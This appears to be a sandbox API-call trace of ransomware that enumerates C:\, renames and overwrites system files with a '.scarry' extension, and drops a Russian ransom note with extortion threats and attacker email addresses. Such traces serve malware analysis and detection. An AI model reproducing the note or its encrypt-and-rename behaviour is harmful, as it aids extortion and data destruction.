[0103.281] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x575308 [0103.281] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0103.282] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0103.282] FileTimeToLocalFileTime (in: lpFileTime=0x18fbb8, lpLocalFileTime=0x18fac8 | out: lpLocalFileTime=0x18fac8) returned 1 [0103.282] FileTimeToDosDateTime (in: lpFileTime=0x18fac8, lpFatDate=0x18fb86, lpFatTime=0x18fb84 | out: lpFatDate=0x18fb86, lpFatTime=0x18fb84) returned 1 [0103.282] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.282] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.282] GlobalUnlock (hMem=0x45000c) returned 0 [0103.282] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.282] GlobalLock (hMem=0x450004) returned 0x588000 [0103.282] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.282] GlobalUnlock (hMem=0x45000c) returned 0 [0103.282] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.282] GlobalUnlock (hMem=0x450004) returned 0 [0103.282] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.282] CharLowerBuffW (in: lpsz="bootmgr", cchLength=0x7 | out: lpsz="bootmgr") returned 0x7 [0103.282] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.282] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.283] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac40, cbMultiByte=36, lpWideCharStr=0x18ea64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0103.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\bootmgr", cchWideChar=10, lpMultiByteStr=0x18ea40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\bootmgr", lpUsedDefaultChar=0x0) returned 10 [0103.283] CreateFileW (lpFileName="C:\\я" (normalized: "c:\\я"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0103.289] WriteFile (in: hFile=0x190, lpBuffer=0x1ea1bc8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18fa70, lpOverlapped=0x0 | out: lpBuffer=0x1ea1bc8*, lpNumberOfBytesWritten=0x18fa70*=0x1, lpOverlapped=0x0) returned 1 [0103.290] CloseHandle (hObject=0x190) returned 1 [0103.292] DeleteFileW (lpFileName="C:\\я" (normalized: "c:\\я")) returned 1 [0103.296] FindFirstFileW (in: lpFileName="C:\\bootmgr", lpFindFileData=0x18f804 | out: lpFindFileData=0x18f804*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 0x572d90 [0103.296] FileTimeToLocalFileTime (in: lpFileTime=0x18f818, lpLocalFileTime=0x18f730 | out: lpLocalFileTime=0x18f730) returned 1 [0103.296] FileTimeToDosDateTime (in: lpFileTime=0x18f730, lpFatDate=0x18f7e6, lpFatTime=0x18f7e4 | out: lpFatDate=0x18f7e6, lpFatTime=0x18f7e4) returned 1 [0103.296] FindClose (in: hFindFile=0x572d90 | out: hFindFile=0x572d90) returned 1 [0103.296] SetFileAttributesW (lpFileName="C:\\bootmgr", dwFileAttributes=0x20) returned 0 [0103.297] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.297] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f710*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18f710*=0) returned 0xffffffff [0103.297] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f710*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18f710*=0) returned 0xffffffff [0103.297] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=-1, lpDistanceToMoveHigh=0x18f710*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18f710*=-1) returned 0xffffffff [0103.298] ReadFile (in: hFile=0xffffffff, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x18f734, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08, lpNumberOfBytesRead=0x18f734*=0x0, lpOverlapped=0x0) returned 0 [0103.298] GlobalLock (hMem=0x450004) returned 0x588000 [0103.299] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.299] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.299] GlobalUnlock (hMem=0x45000c) returned 0 [0103.299] GlobalReAlloc (hMem=0x45000c, dwBytes=0x4000, uFlags=0x2) returned 0x45000c [0103.299] GlobalLock (hMem=0x45000c) returned 0x58e010 [0103.299] GlobalHandle (pMem=0x58e010) returned 0x45000c [0103.299] GlobalUnlock (hMem=0x45000c) returned 0 [0103.299] GlobalReAlloc (hMem=0x45000c, dwBytes=0x6000, uFlags=0x2) returned 0x45000c [0103.300] GlobalLock (hMem=0x45000c) returned 0x592020 [0103.300] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.300] GlobalUnlock (hMem=0x450004) returned 0 [0103.300] GlobalHandle (pMem=0x592020) returned 0x45000c [0103.300] GlobalUnlock (hMem=0x45000c) returned 0 [0103.300] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.300] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.300] GlobalUnlock (hMem=0x45000c) returned 0 [0103.300] GlobalReAlloc (hMem=0x45000c, dwBytes=0x6000, uFlags=0x2) returned 0x45000c [0103.300] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.300] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.300] GlobalUnlock (hMem=0x45000c) returned 0 [0103.300] ReadFile (in: hFile=0xffffffff, lpBuffer=0x1e4d270, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x18f734, lpOverlapped=0x0 | out: lpBuffer=0x1e4d270, lpNumberOfBytesRead=0x18f734*=0x0, lpOverlapped=0x0) returned 0 [0103.300] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f728*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18f728*=-1) returned 0xffffffff [0103.300] WriteFile (in: hFile=0xffffffff, lpBuffer=0x1e79f08, nNumberOfBytesToWrite=0x4018, lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0) returned 0 [0103.300] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=-1, lpDistanceToMoveHigh=0x18f728*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18f728*=-1) returned 0xffffffff [0103.300] WriteFile (in: hFile=0xffffffff, lpBuffer=0x1e4d270, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0) returned 0 [0103.300] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18f7ac, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0) returned 0 [0103.300] WriteFile (in: hFile=0xffffffff, lpBuffer=0x1ea1b98, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0) returned 0 [0103.477] WriteFile (in: hFile=0xffffffff, lpBuffer=0x1e79f28, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0) returned 0 [0103.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7e018, cbMultiByte=26, lpWideCharStr=0x18e740, cchWideChar=2047 | out: lpWideCharStr="f4Bw=XvJqdf6BYP1mVw.scarry\x18戟矇戤矇ࢭ矍") returned 26 [0103.477] MoveFileW (lpExistingFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), lpNewFileName="C:\\f4Bw=XvJqdf6BYP1mVw.scarry" (normalized: "c:\\f4bw=xvjqdf6byp1mvw.scarry")) returned 1 [0103.478] CreateFileW (lpFileName="C:\\f4Bw=XvJqdf6BYP1mVw.scarry" (normalized: "c:\\f4bw=xvjqdf6byp1mvw.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.478] SetFileTime (hFile=0xffffffff, lpCreationTime=0x18f7d0, lpLastAccessTime=0x18f7c8, lpLastWriteTime=0x18f7c0) returned 0 [0103.478] CloseHandle (hObject=0xffffffff) returned 0 [0103.479] SetFileAttributesW (lpFileName="C:\\f4Bw=XvJqdf6BYP1mVw.scarry", dwFileAttributes=0x27) returned 0 [0103.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18ea68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXTרּ\x18\x03") returned 36 [0103.479] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.479] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.479] GlobalUnlock (hMem=0x45000c) returned 0 [0103.479] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.479] GlobalLock (hMem=0x450004) returned 0x588000 [0103.479] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.479] GlobalUnlock (hMem=0x45000c) returned 0 [0103.479] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.479] GlobalUnlock (hMem=0x450004) returned 0 [0103.480] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0103.483] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0103.483] FindFirstFileW (in: lpFileName="C:\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18f81c | out: lpFindFileData=0x18f81c*(dwFileAttributes=0x553a80, ftCreationTime.dwLowDateTime=0x22239048, ftCreationTime.dwHighDateTime=0x550000, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x553a80, nFileSizeHigh=0x2000002, nFileSizeLow=0x9569b257, dwReserved0=0xe4001ffb, dwReserved1=0x78e, cFileName="锈Ǫ磻\x18\x03", cAlternateFileName="")) returned 0xffffffff [0103.483] GetLastError () returned 0x2 [0103.483] CreateFileW (lpFileName="C:\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0103.483] WriteFile (in: hFile=0x190, lpBuffer=0x1e7ad38*, nNumberOfBytesToWrite=0xdf9, lpNumberOfBytesWritten=0x18fa24, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesWritten=0x18fa24*=0xdf9, lpOverlapped=0x0) returned 1 [0103.485] CloseHandle (hObject=0x190) returned 1 [0103.507] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0103.507] FileTimeToLocalFileTime (in: lpFileTime=0x18fbb8, lpLocalFileTime=0x18fac4 | out: lpLocalFileTime=0x18fac4) returned 1 [0103.507] FileTimeToDosDateTime (in: lpFileTime=0x18fac4, lpFatDate=0x18fb86, lpFatTime=0x18fb84 | out: lpFatDate=0x18fb86, lpFatTime=0x18fb84) returned 1 [0103.507] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.507] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.507] GlobalUnlock (hMem=0x450004) returned 0 [0103.507] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.507] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.507] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.507] GlobalUnlock (hMem=0x450004) returned 0 [0103.507] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.507] GlobalUnlock (hMem=0x45000c) returned 0 [0103.507] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.507] CharLowerBuffW (in: lpsz="BOOTSECT.BAK", cchLength=0xc | out: lpsz="bootsect.bak") returned 0xc [0103.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18ea64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXTרּ\x18\x03") returned 36 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\BOOTSECT.BAK", cchWideChar=15, lpMultiByteStr=0x18ea40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\BOOTSECT.BAK", lpUsedDefaultChar=0x0) returned 15 [0103.508] CharLowerBuffW (in: lpsz=".BAK", cchLength=0x4 | out: lpsz=".bak") returned 0x4 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".bak", cchWideChar=4, lpMultiByteStr=0x18ea64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".bakñ", lpUsedDefaultChar=0x0) returned 4 [0103.508] FindFirstFileW (in: lpFileName="C:\\BOOTSECT.BAK", lpFindFileData=0x18f804 | out: lpFindFileData=0x18f804*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 0x577df0 [0103.508] FileTimeToLocalFileTime (in: lpFileTime=0x18f818, lpLocalFileTime=0x18f730 | out: lpLocalFileTime=0x18f730) returned 1 [0103.508] FileTimeToDosDateTime (in: lpFileTime=0x18f730, lpFatDate=0x18f7e6, lpFatTime=0x18f7e4 | out: lpFatDate=0x18f7e6, lpFatTime=0x18f7e4) returned 1 [0103.508] FindClose (in: hFindFile=0x577df0 | out: hFindFile=0x577df0) returned 1 [0103.508] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x20) returned 1 [0103.510] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0103.510] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f710*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18f710*=0) returned 0x0 [0103.510] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f710*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18f710*=0) returned 0x2000 [0103.510] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f710*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18f710*=0) returned 0x0 [0103.510] ReadFile (in: hFile=0x190, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x18f734, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18f734*=0x2000, lpOverlapped=0x0) returned 1 [0103.560] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.560] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.560] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.560] GlobalUnlock (hMem=0x450004) returned 0 [0103.560] GlobalReAlloc (hMem=0x450004, dwBytes=0x4000, uFlags=0x2) returned 0x450004 [0103.561] GlobalLock (hMem=0x450004) returned 0x58c010 [0103.561] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.561] GlobalUnlock (hMem=0x45000c) returned 0 [0103.561] GlobalHandle (pMem=0x58c010) returned 0x450004 [0103.561] GlobalUnlock (hMem=0x450004) returned 0 [0103.562] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.562] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.562] GlobalUnlock (hMem=0x450004) returned 0 [0103.562] GlobalReAlloc (hMem=0x450004, dwBytes=0x4000, uFlags=0x2) returned 0x450004 [0103.562] GlobalLock (hMem=0x450004) returned 0x588000 [0103.562] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.562] 